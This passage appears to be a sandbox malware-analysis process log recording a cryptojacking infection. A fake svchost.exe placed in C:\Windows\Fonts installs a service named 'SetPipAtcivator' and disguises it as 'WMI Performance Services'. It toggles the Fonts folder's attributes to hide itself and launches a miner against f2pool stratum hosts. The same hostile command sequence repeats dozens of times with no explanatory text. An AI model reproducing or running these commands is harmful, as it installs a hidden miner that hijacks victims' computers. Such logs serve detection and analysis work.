c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:60

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5756

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1656

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5264

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3076

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6584

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5868

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5392

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6284

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5488

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4696

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3780

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6872

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2932

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6536

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2696

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3176

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4992

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6304

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5988

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1488

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:7132

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2132

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:516

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6408

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6168

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1452

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5848

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3464

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1792

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6264

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6964

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:1168

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6632

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5344

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5512

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5856

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6080

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:7048

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:656

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:7148

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6952

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:376

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6832

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6420

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Drops file in Windows directory
PID:5632

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:1020

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6896

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6760

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:6956

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6028

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5640

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4544

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5720

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5236

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3016

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6172

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5384

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5284

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4972

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5480

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5052

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5852

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5644

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6984

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:3704

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1240

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:920

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4016

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4520

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5580

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4848

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6332

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:6916

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5900

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6224

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6096

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5152

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4056

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:7008

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6696

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4564

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5032

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2332

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5804

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4316

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5576

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:5180

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6480

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3592

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6280

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6788

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3772

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5104

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5288

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1656

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6640

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2936

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6232

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3992

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4680

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6932

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:7120

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6316

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5704

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5664

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4296

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5352

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:948

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:7088

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:6072

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5148

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5572

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6184

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:3628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5564

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5376

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6052

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:748

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3908

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5544

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:6152

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3288

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3588

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2324

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3396

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5080

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4836

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5728

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6552

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5984

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5516

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5424

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6472

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:1368

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4484

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:7020

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:916

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3704

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6884

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5420

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3932

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4620

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:7096

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5756

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4780

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6576

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1452

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:7092

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2564

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4024

\??\c:\windows\Fonts\svchost.exe
